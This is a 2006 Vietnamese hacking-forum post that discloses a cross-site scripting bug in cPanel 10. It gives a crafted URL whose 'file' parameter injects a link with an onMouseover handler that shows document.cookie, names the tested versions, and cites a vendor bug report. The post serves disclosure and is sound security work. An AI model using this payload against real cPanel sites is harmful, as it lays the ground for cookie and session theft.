banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Bug cross-site scripting trong Cpanel 10 (09-06-2006)  XML
  [Question]   Bug cross-site scripting trong Cpanel 10 (09-06-2006) 28/06/2006 22:35:10 (+0700) | #1 | 1737
[Avatar]
phamquoc_truong
Elite Member

[Minus]    0    [Plus]
Joined: 04/04/2004 07:54:12
Messages: 79
Location: PeaceWorld
Offline
[Profile] [PM]
Sau khi đăng nhập đánh dòng này trên address :
Code:
http://tendomain:2082/frontend/x2/files/select.html?dir=/&file=Moved%20<a%20href='?'%20onMouseover='alert(document.cookie)'>Here%20<!--

rồi move chuột vào chữ here !

Lỗi phát hiện ngày 09-06-2006. Đã test trên 10.8.2-CURRENT 118 & 10.8.1-RELEASE 113

Nguyễn bản : http://bugzilla.cpanel.net/show_bug.cgi?id=4282
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|